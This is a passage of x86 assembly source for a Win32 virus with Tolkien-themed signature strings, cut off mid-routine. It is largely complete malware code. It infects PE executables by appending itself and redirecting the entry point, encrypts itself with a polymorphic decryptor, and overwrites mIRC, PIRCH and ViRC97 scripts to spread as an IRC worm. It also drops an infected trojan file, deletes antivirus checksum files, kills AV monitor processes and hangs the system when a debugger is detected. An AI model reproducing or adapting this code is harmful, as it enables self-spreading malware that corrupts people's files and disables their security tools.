cmp byte ptr [ebp+mirrormirror],00h ; available directories
|
|||
|
jnz requiem
|
|||
|
ret
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Search MASK and infect found uninfected files
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
Infect: and dword ptr [ebp+infections],00000000h ; reset countah
|
|||
|
lea eax,[ebp+offset WIN32_FIND_DATA] ; Find's shit
|
|||
|
push eax
|
|||
|
|
|||
|
lea eax,[ebp+offset _MASK]
|
|||
|
push eax
|
|||
|
|
|||
|
apicall _FindFirstFileA ; Get first file on directory
|
|||
|
cmp_ eax,FailInfect ; Failed? Shit...
|
|||
|
mov dword ptr [ebp+SearchHandle],eax
|
|||
|
|
|||
|
__1: lea edi,[ebp+WFD_szFileName]
|
|||
|
call AvoidShitFiles
|
|||
|
jc __2
|
|||
|
|
|||
|
push dword ptr [ebp+NewEIP]
|
|||
|
push dword ptr [ebp+OldEIP]
|
|||
|
push dword ptr [ebp+ModBase]
|
|||
|
call Infection ; Infect file
|
|||
|
pop dword ptr [ebp+ModBase]
|
|||
|
pop dword ptr [ebp+OldEIP]
|
|||
|
pop dword ptr [ebp+NewEIP]
|
|||
|
jc __2
|
|||
|
|
|||
|
inc byte ptr [ebp+infections]
|
|||
|
cmp byte ptr [ebp+infections],n_infections ; Did we infected them?
|
|||
|
jae FailInfect ; Yeah... :)
|
|||
|
|
|||
|
__2: lea edi,[ebp+WFD_szFileName] ; Clear name field
|
|||
|
mov ecx,MAX_PATH
|
|||
|
xor al,al
|
|||
|
rep stosb
|
|||
|
|
|||
|
lea eax,[ebp+offset WIN32_FIND_DATA] ; Search for another file
|
|||
|
push eax
|
|||
|
push dword ptr [ebp+SearchHandle]
|
|||
|
apicall _FindNextFileA
|
|||
|
cmpz eax,CloseSearchHandle
|
|||
|
jmp __1
|
|||
|
|
|||
|
CloseSearchHandle:
|
|||
|
push dword ptr [ebp+SearchHandle] ; Close search handle
|
|||
|
apicall _FindClose
|
|||
|
FailInfect:
|
|||
|
ret
|
|||
|
|
|||
|
db 0,"[Luthien is still alive in the world]",0
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Traversal search for mIRC and PIRCH scripts (modified version of LJ's code)
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
TraversalSearch:
|
|||
|
lea esi,[ebp+tempcurdir] ; Get the current directory
|
|||
|
push esi ; (We only want the current
|
|||
|
push 7Fh ; drive)
|
|||
|
apicall _GetCurrentDirectoryA
|
|||
|
|
|||
|
lodsb ; Get drive
|
|||
|
|
|||
|
mov byte ptr [ebp+root],al ; Put it in its variable
|
|||
|
|
|||
|
lea eax,[ebp+root] ; Reach the root directory
|
|||
|
push eax ; of the current drive
|
|||
|
apicall _SetCurrentDirectoryA
|
|||
|
|
|||
|
Traversal:
|
|||
|
lea esi,[ebp+key_mIRC] ; Already catched? Avoid
|
|||
|
call RegExist ; this if so, as it needs many
|
|||
|
jc nomoretosearch ; time, and the user could
|
|||
|
lea esi,[ebp+key_PIRCH] ; notice our presence :)
|
|||
|
call RegExist
|
|||
|
jc nomoretosearch
|
|||
|
lea esi,[ebp+key_ViRC97]
|
|||
|
call RegExist
|
|||
|
jc nomoretosearch
|
|||
|
xor ebx,ebx ; Clear counter
|
|||
|
|
|||
|
findfirstdir:
|
|||
|
lea edi,[ebp+_WIN32_FIND_DATA] ; Search for directories
|
|||
|
push edi
|
|||
|
lea eax,[ebp+ALL_MASK]
|
|||
|
push eax
|
|||
|
apicall _FindFirstFileA
|
|||
|
cmp_ eax,notfoundfirstdir
|
|||
|
|
|||
|
mov dword ptr [ebp+TSHandle],eax
|
|||
|
|
|||
|
main_trav:
|
|||
|
cmp dword ptr [ebp+_WFD_dwFileAttributes],directory_attr
|
|||
|
jnz findnextdir
|
|||
|
|
|||
|
lea eax,[ebp+_WFD_szFileName]
|
|||
|
cmp byte ptr [eax],"." ; Is dir "." or ".."?
|
|||
|
jz findnextdir ; Shitz
|
|||
|
|
|||
|
push eax
|
|||
|
apicall _SetCurrentDirectoryA
|
|||
|
|
|||
|
pushad
|
|||
|
call Worms ; Let's rock!
|
|||
|
popad
|
|||
|
|
|||
|
push dword ptr [ebp+TSHandle] ; Save handle
|
|||
|
inc ebx ; Increase counter :)
|
|||
|
jmp findfirstdir
|
|||
|
findnextdir:
|
|||
|
push edi ; Search for another dir
|
|||
|
push dword ptr [ebp+TSHandle]
|
|||
|
apicall _FindNextFileA
|
|||
|
cmpz eax,notfoundfirstdir
|
|||
|
|
|||
|
jmp main_trav
|
|||
|
notfoundfirstdir:
|
|||
|
lea eax,[ebp+dotdot] ; Go back 1 dir
|
|||
|
push eax
|
|||
|
apicall _SetCurrentDirectoryA
|
|||
|
|
|||
|
or ebx,ebx ; Are we in root? yeah, it's
|
|||
|
jz nomoretosearch ; over! our search finished!
|
|||
|
|
|||
|
dec ebx ; Decrease countah
|
|||
|
pop dword ptr [ebp+TSHandle]
|
|||
|
jmp findnextdir
|
|||
|
|
|||
|
notfoundnextdir:
|
|||
|
push dword ptr [ebp+TSHandle]
|
|||
|
apicall _FindClose
|
|||
|
jmp notfoundfirstdir
|
|||
|
|
|||
|
nomoretosearch:
|
|||
|
lea esi,[ebp+key_PIRCH] ; Mark all registry keys...
|
|||
|
call PutReg
|
|||
|
lea esi,[ebp+key_mIRC]
|
|||
|
call PutReg
|
|||
|
lea esi,[ebp+key_ViRC97]
|
|||
|
call PutReg
|
|||
|
|
|||
|
lea esi,[ebp+tempcurdir] ; And put current directory
|
|||
|
push esi ; back :)
|
|||
|
apicall _SetCurrentDirectoryA
|
|||
|
ret
|
|||
|
|
|||
|
db 0,"[Thorin,Dori,Nori,Ori,Balin,Dwalin,Fili,Kili,Oin,Gloin,"
|
|||
|
db "Bifur,Bofur,Bombur]",0
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Worms (mIRC & PIRCH) installer
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
Worms:
|
|||
|
call DeleteShit ; Delete AV CRCs from all dir
|
|||
|
push 80h ; We test for the presence of
|
|||
|
lea eax,[ebp+PirchWormFile] ; the scripts by setting a
|
|||
|
push eax ; normal attribute to them.
|
|||
|
apicall _SetFileAttributesA ; If the api returns us an
|
|||
|
xchg eax,ecx ; error, then we know the
|
|||
|
jecxz TryWithMIRC ; file doesn't exist :)
|
|||
|
jmp BorrowPIRCH ; As in DOS! ;)
|
|||
|
TryWithMIRC:
|
|||
|
push 80h
|
|||
|
lea eax,[ebp+mIRCWormFile]
|
|||
|
push eax
|
|||
|
apicall _SetFileAttributesA
|
|||
|
xchg eax,ecx
|
|||
|
jecxz TryWithViRC97
|
|||
|
jmp BorrowMIRC
|
|||
|
TryWithViRC97:
|
|||
|
push 80h
|
|||
|
lea eax,[ebp+ViRC97WormFile]
|
|||
|
push eax
|
|||
|
apicall _SetFileAttributesA
|
|||
|
xchg eax,ecx
|
|||
|
jecxz ExitWorms
|
|||
|
jmp BorrowViRC97
|
|||
|
ExitWorms:
|
|||
|
ret
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; PIRCH script overwrite
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
BorrowPIRCH: ; If file found, drop the
|
|||
|
xor eax,eax ; new script file
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push 00000003h
|
|||
|
push eax
|
|||
|
inc eax
|
|||
|
push eax
|
|||
|
push 40000000h
|
|||
|
call _PIRCH
|
|||
|
|
|||
|
PirchWormFile db "events.ini",0 ; What to overwrite
|
|||
|
|
|||
|
_PIRCH: apicall _CreateFileA
|
|||
|
|
|||
|
mov dword ptr [ebp+TempHandle],eax
|
|||
|
|
|||
|
push 00000000h ; Overwrite with our script :)
|
|||
|
lea ebx,[ebp+iobytes]
|
|||
|
push ebx
|
|||
|
push PirchWormSize
|
|||
|
lea ebx,[ebp+PirchWorm]
|
|||
|
push ebx
|
|||
|
push eax
|
|||
|
apicall _WriteFile
|
|||
|
|
|||
|
mov ecx,PirchWormSize ; And trunc the file, so there
|
|||
|
call TruncFile ; won't be more shit ;)
|
|||
|
|
|||
|
push dword ptr [ebp+TempHandle]
|
|||
|
apicall _CloseHandle
|
|||
|
ret
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; mIRC script overwrite
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
BorrowMIRC: ; Same as above, but with
|
|||
|
xor eax,eax ; mIRC scripts
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push 00000003h
|
|||
|
push eax
|
|||
|
inc eax
|
|||
|
push eax
|
|||
|
push 40000000h
|
|||
|
call _mIRC
|
|||
|
|
|||
|
mIRCWormFile db "mirc.ini",0
|
|||
|
|
|||
|
_mIRC: apicall _CreateFileA
|
|||
|
|
|||
|
mov dword ptr [ebp+TempHandle],eax
|
|||
|
|
|||
|
push 00000000h
|
|||
|
lea ebx,[ebp+iobytes]
|
|||
|
push ebx
|
|||
|
push mIRCWormSize
|
|||
|
lea ebx,[ebp+mIRCWorm]
|
|||
|
push ebx
|
|||
|
push eax
|
|||
|
apicall _WriteFile
|
|||
|
|
|||
|
mov ecx,mIRCWormSize
|
|||
|
call TruncFile
|
|||
|
|
|||
|
push dword ptr [ebp+TempHandle]
|
|||
|
apicall _CloseHandle
|
|||
|
ret
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; ViRC97 script overwrite
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
BorrowViRC97: ; Same as above, but with
|
|||
|
xor eax,eax ; ViRC97 scripts
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push 00000003h
|
|||
|
push eax
|
|||
|
inc eax
|
|||
|
push eax
|
|||
|
push 40000000h
|
|||
|
call _ViRC97
|
|||
|
|
|||
|
ViRC97WormFile db "default.lib",0
|
|||
|
|
|||
|
_ViRC97:apicall _CreateFileA
|
|||
|
|
|||
|
mov dword ptr [ebp+TempHandle],eax
|
|||
|
|
|||
|
push 00000000h
|
|||
|
lea ebx,[ebp+iobytes]
|
|||
|
push ebx
|
|||
|
push ViRC97WormSize
|
|||
|
lea ebx,[ebp+ViRC97Worm]
|
|||
|
push ebx
|
|||
|
push eax
|
|||
|
apicall _WriteFile
|
|||
|
|
|||
|
mov ecx,ViRC97WormSize
|
|||
|
call TruncFile
|
|||
|
|
|||
|
push dword ptr [ebp+TempHandle]
|
|||
|
apicall _CloseHandle
|
|||
|
ret
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Unpack, drop and infect our PE file [TROJAN mode]
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
DropPR0N:
|
|||
|
push drop_old_size ; Allocate some memory
|
|||
|
push 00000000h
|
|||
|
apicall _GlobalAlloc
|
|||
|
cmpz eax,_ExitDropPR0N
|
|||
|
mov dword ptr [ebp+GlobalAllocHnd],ecx
|
|||
|
|
|||
|
mov edi,dropper_size ; Unpack in allocated memory
|
|||
|
xchg edi,ecx ; the dropper
|
|||
|
lea esi,[ebp+dropper]
|
|||
|
call LSCE_UnPack
|
|||
|
|
|||
|
push 00000000h ; Create the dropper on
|
|||
|
push 00000080h ; C:\PR0N.EXE (hi darkman!) ;)
|
|||
|
push 00000002h
|
|||
|
push 00000000h
|
|||
|
push 00000001h
|
|||
|
push 40000000h
|
|||
|
call _PR0N
|
|||
|
|
|||
|
pr0nfile db "C:\PR0N.EXE",0
|
|||
|
|
|||
|
_ExitDropPR0N:
|
|||
|
jmp ExitDropPR0N
|
|||
|
|
|||
|
_PR0N: apicall _CreateFileA
|
|||
|
|
|||
|
push eax ; Write it, sucka!
|
|||
|
push 00000000h
|
|||
|
lea ebx,[ebp+iobytes]
|
|||
|
push ebx
|
|||
|
push drop_old_size
|
|||
|
push dword ptr [ebp+GlobalAllocHnd]
|
|||
|
push eax
|
|||
|
apicall _WriteFile
|
|||
|
apicall _CloseHandle
|
|||
|
|
|||
|
lea edi,[ebp+pr0nfile] ; Infect it
|
|||
|
call _Infection
|
|||
|
|
|||
|
push dword ptr [ebp+GlobalAllocHnd] ; And free allocated memory
|
|||
|
apicall _GlobalFree
|
|||
|
ExitDropPR0N:
|
|||
|
ret
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Self protect virus againist debuggers
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
AntiDebugger:
|
|||
|
apicall _GetVersion ; Check for Win95, as it dont
|
|||
|
cmp eax,80000000h ; have the IsDebuggerPresent
|
|||
|
jb BetterNot ; API.
|
|||
|
|
|||
|
cmp ax,0A04h
|
|||
|
jb BetterNot
|
|||
|
|
|||
|
lea esi,[ebp+@IsDebuggerPresent]
|
|||
|
call GetAPI_ET
|
|||
|
call eax ; Are we being debugged? Shit!
|
|||
|
cmpz eax,BetterNot
|
|||
|
|
|||
|
cli ; Who said that Windoze don't
|
|||
|
jmp $-1 ; use interrupts? ;) Int8 rlz
|
|||
|
|
|||
|
BetterNot:
|
|||
|
ret
|
|||
|
|
|||
|
db 0,"[Dedicated to all Tolkien fans over the middle-earth]",0
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Kill AV CRC files
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
DeleteShit:
|
|||
|
pushad
|
|||
|
lea edi,[ebp+@@BadPhilez] ; Load pointer to first file
|
|||
|
mov ecx,bad_number ; Number of files to erase
|
|||
|
|
|||
|
killem: push ecx ; Save the number
|
|||
|
push edi ; Push file to erase
|
|||
|
apicall _DeleteFileA ; Delete it!
|
|||
|
pop ecx ; Restore the number
|
|||
|
xor al,al ; Get the next file
|
|||
|
scasb
|
|||
|
jnz $-1
|
|||
|
loop killem ; Loop and delete another :)
|
|||
|
popad
|
|||
|
ret
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Kill the processes of determinated AV monitors
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
KillMonitors:
|
|||
|
lea edi,[ebp+Monitors2Kill]
|
|||
|
KM_L00p:
|
|||
|
call TerminateProc
|
|||
|
xor al,al ; Reach the end of string
|
|||
|
scasb
|
|||
|
jnz $-1
|
|||
|
cmp byte ptr [edi],0BBh ; Last item of array?
|
|||
|
jnz KM_L00p
|
|||
|
ret
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Avoid infection of certain files
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; input:
|
|||
|
; EDI = Pointer to file name
|
|||
|
; output:
|
|||
|
; CF = Set to 1 if it exist, to 0 if it doesn't
|
|||
|
;
|
|||
|
|
|||
|
AvoidShitFiles:
|
|||
|
lea esi,[ebp+@@BadProgramz] ; Ptr to table
|
|||
|
ASF_Loop:
|
|||
|
xor eax,eax ; Clear EAX
|
|||
|
lodsb ; Load size of string in AL
|
|||
|
cmp al,0BBh ; End of table?
|
|||
|
jz AllShitFilesProcessed ; Oh, shit!
|
|||
|
xchg eax,ecx ; Put Size in ECX
|
|||
|
push edi ; Preserve program pointer
|
|||
|
rep cmpsb ; Compare both strings
|
|||
|
pop edi ; Restore program pointer
|
|||
|
jz ShitFileFound ; Damn, a shitty file!
|
|||
|
add esi,ecx ; Pointer to another string
|
|||
|
jmp ASF_Loop ; in table & loop
|
|||
|
AllShitFilesProcessed:
|
|||
|
mov cl,00h ; Overlap, so CL = 0F9h
|
|||
|
org $-1
|
|||
|
ShitFileFound:
|
|||
|
stc ; Set carry
|
|||
|
ret
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; PE Infection (with parameters)
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; input:
|
|||
|
; EDI = Pointer to file name
|
|||
|
; output:
|
|||
|
; Nothing.
|
|||
|
;
|
|||
|
|
|||
|
_Infection:
|
|||
|
push edi
|
|||
|
apicall _GetFileAttributesA
|
|||
|
cmp_ eax,_ExitInfection
|
|||
|
mov dword ptr [ebp+WFD_dwFileAttributes],eax
|
|||
|
|
|||
|
mov esi,edi
|
|||
|
call OpenFile
|
|||
|
cmp_ eax,_ExitInfection
|
|||
|
|
|||
|
push eax
|
|||
|
|
|||
|
push 00000000h
|
|||
|
push eax
|
|||
|
apicall _GetFileSize
|
|||
|
mov dword ptr [ebp+WFD_nFileSizeLow],eax
|
|||
|
|
|||
|
apicall _CloseHandle
|
|||
|
|
|||
|
lea esi,[ebp+WFD_szFileName]
|
|||
|
xchg esi,edi
|
|||
|
duhast: lodsb
|
|||
|
or al,al
|
|||
|
jz engel
|
|||
|
stosb
|
|||
|
jmp duhast
|
|||
|
engel: stosb
|
|||
|
push dword ptr [ebp+NewEIP]
|
|||
|
push dword ptr [ebp+OldEIP]
|
|||
|
push dword ptr [ebp+ModBase]
|
|||
|
call Infection
|
|||
|
pop dword ptr [ebp+ModBase]
|
|||
|
pop dword ptr [ebp+OldEIP]
|
|||
|
pop dword ptr [ebp+NewEIP]
|
|||
|
|
|||
|
mov cl,00h ; Overlapppppp
|
|||
|
org $-1
|
|||
|
_ExitInfection:
|
|||
|
stc
|
|||
|
ret
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; PE Infection (with WIN32_FIND_DATA)
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; input:
|
|||
|
; Nothing (everything needed is in WFD structure).
|
|||
|
; output:
|
|||
|
; Nothing.
|
|||
|
;
|
|||
|
|
|||
|
Infection:
|
|||
|
lea esi,[ebp+WFD_szFileName] ; Get FileName to infect
|
|||
|
push 80h
|
|||
|
push esi
|
|||
|
apicall _SetFileAttributesA ; Wipe its attributes
|
|||
|
|
|||
|
call OpenFile ; Open it
|
|||
|
|
|||
|
cmp_ eax,CantOpen
|
|||
|
mov dword ptr [ebp+FileHandle],eax
|
|||
|
|
|||
|
mov ecx,dword ptr [ebp+WFD_nFileSizeLow] ; 1st we create map with
|
|||
|
call CreateMap ; its exact size
|
|||
|
cmpz_ eax,CloseFile
|
|||
|
|
|||
|
mov dword ptr [ebp+MapHandle],eax
|
|||
|
|
|||
|
mov ecx,dword ptr [ebp+WFD_nFileSizeLow]
|
|||
|
call MapFile ; Map it
|
|||
|
cmpz_ eax,UnMapFile
|
|||
|
|
|||
|
mov dword ptr [ebp+MapAddress],eax
|
|||
|
|
|||
|
mov esi,eax ; Get PE Header
|
|||
|
mov esi,[esi+3Ch]
|
|||
|
add esi,eax
|
|||
|
cmp dword ptr [esi],"EP" ; Is it PE?
|
|||
|
jnz NoInfect
|
|||
|
|
|||
|
cmp dword ptr [esi+mark],ddInfMark ; Was it infected?
|
|||
|
jz NoInfect
|
|||
|
|
|||
|
push dword ptr [ebp+MapAddress]
|
|||
|
apicall _UnmapViewOfFile
|
|||
|
|
|||
|
push dword ptr [ebp+MapHandle]
|
|||
|
apicall _CloseHandle
|
|||
|
|
|||
|
mov ecx,dword ptr [ebp+WFD_nFileSizeLow] ; And Map all again.
|
|||
|
add ecx,virus_size
|
|||
|
call CreateMap
|
|||
|
cmpz_ eax,CloseFile
|
|||
|
|
|||
|
mov dword ptr [ebp+MapHandle],eax
|
|||
|
|
|||
|
mov ecx,dword ptr [ebp+WFD_nFileSizeLow]
|
|||
|
add ecx,virus_size
|
|||
|
call MapFile
|
|||
|
cmpz_ eax,UnMapFile
|
|||
|
mov dword ptr [ebp+MapAddress],eax
|
|||
|
|
|||
|
mov esi,eax
|
|||
|
mov esi,[eax+3Ch]
|
|||
|
add esi,eax
|
|||
|
|
|||
|
call GetLastSection ; ESI = Last Section
|
|||
|
; EDI = PE header
|
|||
|
|
|||
|
mov eax,[edi+28h] ; Save original EIP
|
|||
|
mov dword ptr [ebp+OldEIP],eax
|
|||
|
|
|||
|
mov edx,[esi+10h]
|
|||
|
mov ebx,edx
|
|||
|
add edx,[esi+14h] ; EDX = Phisical address where
|
|||
|
; append virus
|
|||
|
|
|||
|
push edx
|
|||
|
|
|||
|
mov eax,ebx
|
|||
|
add eax,[esi+0Ch] ; EAX = VA of new EIP
|
|||
|
mov [edi+28h],eax ; Set the new entrypoint
|
|||
|
mov dword ptr [ebp+NewEIP],eax
|
|||
|
|
|||
|
mov eax,[esi+10h] ; Retrieve new SizeOfRawData
|
|||
|
add eax,virus_size ; and VirtualSize
|
|||
|
mov ecx,[edi+3Ch]
|
|||
|
call Align
|
|||
|
|
|||
|
mov [esi+10h],eax ; Set new SizeOfRawData
|
|||
|
mov [esi+08h],eax ; Set new VirtualSize
|
|||
|
|
|||
|
pop edx
|
|||
|
|
|||
|
mov eax,[esi+10h] ; Set new SizeOfImage
|
|||
|
add eax,[esi+0Ch]
|
|||
|
mov [edi+50h],eax
|
|||
|
|
|||
|
and dword ptr [edi+0A0h],00h ; Nulify the relocs, so they
|
|||
|
and dword ptr [edi+0A4h],00h ; won't fuck us :)
|
|||
|
|
|||
|
or dword ptr [esi+24h],section_flags ; Set new section attributes
|
|||
|
|
|||
|
mov dword ptr [edi+mark],ddInfMark ; Mark infected files
|
|||
|
|
|||
|
push dword ptr [ebp+WFD_nFileSizeLow]
|
|||
|
pop dword ptr [edi+orig_size] ; Store orig. size for stealth
|
|||
|
|
|||
|
push dword ptr [edi+3Ch]
|
|||
|
push dword ptr [ebp+infections]
|
|||
|
and dword ptr [ebp+infections],00h
|
|||
|
|
|||
|
; Some RDA stuff
|
|||
|
|
|||
|
push edi esi edx ; Save ESI and EDI for later
|
|||
|
lea esi,[ebp+crypto]
|
|||
|
mov edi,encrypt_size
|
|||
|
call CRC32 ; Obtain virus CRC32
|
|||
|
pop edx esi edi
|
|||
|
mov dword ptr [ebp+CRC],eax ; Store it
|
|||
|
|
|||
|
push edx
|
|||
|
apicall _GetTickCount ; Get a random number as seed
|
|||
|
xchg ebx,eax ; for RDA encryption
|
|||
|
pop edx
|
|||
|
|
|||
|
; Append virus & RDA encryption
|
|||
|
|
|||
|
mov edi,dword ptr [ebp+MapAddress] ; Write non crypted part
|
|||
|
add edi,edx
|
|||
|
push edi
|
|||
|
lea esi,[ebp+virus_start]
|
|||
|
mov ecx,non_crypt_size
|
|||
|
cld
|
|||
|
rep movsb
|
|||
|
|
|||
|
mov ecx,encrypt_size ; Encrypt and copy the rest
|
|||
|
cryptl: lodsb
|
|||
|
xor al,bl
|
|||
|
stosb
|
|||
|
loop cryptl
|
|||
|
pop edi
|
|||
|
|
|||
|
; Poly decryptor generation
|
|||
|
|
|||
|
lea eax,[ebp+random_seed] ; Get a slow seed for poly
|
|||
|
push eax
|
|||
|
apicall _GetSystemTime
|
|||
|
|
|||
|
mov eax,poly_virus_size ; Obtain exactly a reliable
|
|||
|
mov ecx,4 ; value of virus_size divided
|
|||
|
call Align ; by 4
|
|||
|
shr eax,2
|
|||
|
xchg eax,ecx
|
|||
|
|
|||
|
mov esi,edi
|
|||
|
add esi,LIMIT
|
|||
|
call THME ; generate the poly decryptor
|
|||
|
|
|||
|
pop dword ptr [ebp+infections]
|
|||
|
|
|||
|
mov eax,edi ; Trunc file
|
|||
|
sub eax,dword ptr [ebp+MapAddress]
|
|||
|
pop ecx
|
|||
|
call Align
|
|||
|
xchg eax,ecx
|
|||
|
call TruncFile
|
|||
|
|
|||
|
jmp UnMapFile
|
|||
|
NoInfect:
|
|||
|
stc
|
|||
|
dec byte ptr [ebp+infections] ; Shit, if we are here,
|
|||
|
mov ecx,dword ptr [ebp+WFD_nFileSizeLow] ; something failed :(
|
|||
|
call TruncFile
|
|||
|
|
|||
|
UnMapFile:
|
|||
|
push dword ptr [ebp+MapAddress] ; Close map view of file
|
|||
|
apicall _UnmapViewOfFile
|
|||
|
|
|||
|
CloseMap:
|
|||
|
push dword ptr [ebp+MapHandle] ; Close map handle
|
|||
|
apicall _CloseHandle
|
|||
|
|
|||
|
CloseFile:
|
|||
|
push dword ptr [ebp+FileHandle] ; Close file handle
|
|||
|
apicall _CloseHandle
|
|||
|
|
|||
|
CantOpen:
|
|||
|
push dword ptr [ebp+WFD_dwFileAttributes]
|
|||
|
lea eax,[ebp+WFD_szFileName] ; Restore old attributes
|
|||
|
push eax
|
|||
|
apicall _SetFileAttributesA
|
|||
|
ret
|
|||
|
|
|||
|
db 0,"[Welcome to the Middle-Earth, my dear friend]",0
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Tiny method for get KERNEL32 base address
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; input:
|
|||
|
; ESI = Program return address
|
|||
|
; ECX = Limit of pages where search
|
|||
|
; output:
|
|||
|
; EAX = Base address of KERNEL32.dll
|
|||
|
;
|
|||
|
|
|||
|
GetK32 proc ; My own little GetK32 :)
|
|||
|
and esi,0FFFF0000h
|
|||
|
_@1: jecxz WeFailed ; Thanx to Super for the idea
|
|||
|
cmp word ptr [esi],"ZM" ; and Qozah for notifying me
|
|||
|
jz CheckPE ; a little error (Thnx man!)
|
|||
|
_@2: sub esi,10000h
|
|||
|
dec ecx
|
|||
|
jmp _@1
|
|||
|
|
|||
|
CheckPE:
|
|||
|
mov edi,[esi+3Ch]
|
|||
|
add edi,esi
|
|||
|
cmp dword ptr [edi],"EP"
|
|||
|
jz WeGotK32
|
|||
|
jmp _@2
|
|||
|
WeFailed:
|
|||
|
cmp byte ptr [ebp+inNT],00h ; Otherwise, hardcode to the
|
|||
|
jz W9X ; proper OS.
|
|||
|
mov esi,kernel_wNT ; NT = 77F00000h
|
|||
|
jmp WeGotK32
|
|||
|
W9X: mov esi,kernel_ ; 9X = BFF70000h
|
|||
|
WeGotK32:
|
|||
|
xchg eax,esi
|
|||
|
ret
|
|||
|
GetK32 endp
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Retrieve API addresses (from Export Table)
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; input:
|
|||
|
; EDI = Pointer to where you want the first API Address
|
|||
|
; ESI = Pointer to the first API Name
|
|||
|
; output:
|
|||
|
; Nothing.
|
|||
|
;
|
|||
|
|
|||
|
GetAPIs proc
|
|||
|
@@1: push esi
|
|||
|
push edi
|
|||
|
call GetAPI_ET
|
|||
|
pop edi
|
|||
|
pop esi
|
|||
|
|
|||
|
stosd
|
|||
|
|
|||
|
xchg edi,esi
|
|||
|
|
|||
|
xor al,al
|
|||
|
@@2: scasb
|
|||
|
jnz @@2
|
|||
|
|
|||
|
xchg edi,esi
|
|||
|
|
|||
|
@@3: cmp byte ptr [esi],0BBh
|
|||
|
jz @@4
|
|||
|
jmp @@1
|
|||
|
@@4: ret
|
|||
|
GetAPIs endp
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Retrieve API address (from Export Table)
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; input:
|
|||
|
; ESI = Pointer to API Name
|
|||
|
; output:
|
|||
|
; EAX = API address
|
|||
|
;
|
|||
|
|
|||
|
GetAPI_ET proc
|
|||
|
mov edx,esi
|
|||
|
mov edi,esi
|
|||
|
|
|||
|
xor al,al
|
|||
|
@_1: scasb
|
|||
|
jnz @_1
|
|||
|
|
|||
|
sub edi,esi ; EDI = API Name size
|
|||
|
mov ecx,edi
|
|||
|
|
|||
|
xor eax,eax
|
|||
|
mov esi,3Ch
|
|||
|
rva2va esi,kernel
|
|||
|
|
|||
|
lodsw
|
|||
|
rva2va eax,kernel
|
|||
|
|
|||
|
mov esi,[eax+78h]
|
|||
|
add esi,1Ch
|
|||
|
rva2va esi,kernel
|
|||
|
|
|||
|
lodsd
|
|||
|
rva2va eax,kernel
|
|||
|
mov dword ptr [ebp+AddressTableVA],eax
|
|||
|
lodsd
|
|||
|
|
|||
|
rva2va eax,kernel
|
|||
|
push eax ; mov [NameTableVA],eax =)
|
|||
|
lodsd
|
|||
|
|
|||
|
rva2va eax,kernel
|
|||
|
|
|||
|
mov dword ptr [ebp+OrdinalTableVA],eax
|
|||
|
pop esi
|
|||
|
|
|||
|
xor ebx,ebx
|
|||
|
|
|||
|
@_3: push esi
|
|||
|
lodsd
|
|||
|
|
|||
|
rva2va eax,kernel
|
|||
|
mov esi,eax
|
|||
|
mov edi,edx
|
|||
|
|
|||
|
push ecx
|
|||
|
cld
|
|||
|
rep cmpsb
|
|||
|
pop ecx
|
|||
|
jz @_4
|
|||
|
pop esi
|
|||
|
add esi,4
|
|||
|
inc ebx
|
|||
|
jmp @_3
|
|||
|
|
|||
|
@_4:
|
|||
|
pop esi
|
|||
|
xchg eax,ebx
|
|||
|
shl eax,1
|
|||
|
add eax,dword ptr [ebp+OrdinalTableVA]
|
|||
|
xor esi,esi
|
|||
|
xchg eax,esi
|
|||
|
lodsw
|
|||
|
shl eax,2
|
|||
|
add eax,dword ptr [ebp+AddressTableVA]
|
|||
|
xchg esi,eax
|
|||
|
lodsd
|
|||
|
rva2va eax,kernel
|
|||
|
ret
|
|||
|
GetAPI_ET endp
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Retrieve API address (from Import Table)
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; input:
|
|||
|
; EDI = Offset of API address to retrieve
|
|||
|
; output:
|
|||
|
; EAX = Address of the API
|
|||
|
; EBX = Address of the API address in the import
|
|||
|
;
|
|||
|
|
|||
|
GetAPI_IT proc
|
|||
|
mov dword ptr [ebp+TempGA_IT1],edi
|
|||
|
mov ebx,edi
|
|||
|
xor al,al
|
|||
|
scasb
|
|||
|
jnz $-1
|
|||
|
sub edi,ebx
|
|||
|
|
|||
|
mov dword ptr [ebp+TempGA_IT2],edi
|
|||
|
|
|||
|
xor eax,eax
|
|||
|
mov esi,dword ptr [ebp+imagebase]
|
|||
|
add esi,3Ch
|
|||
|
lodsw
|
|||
|
add eax,dword ptr [ebp+imagebase]
|
|||
|
xchg esi,eax
|
|||
|
lodsd
|
|||
|
|
|||
|
cmp eax,"EP"
|
|||
|
jnz nopes
|
|||
|
|
|||
|
add esi,7Ch
|
|||
|
lodsd
|
|||
|
push eax
|
|||
|
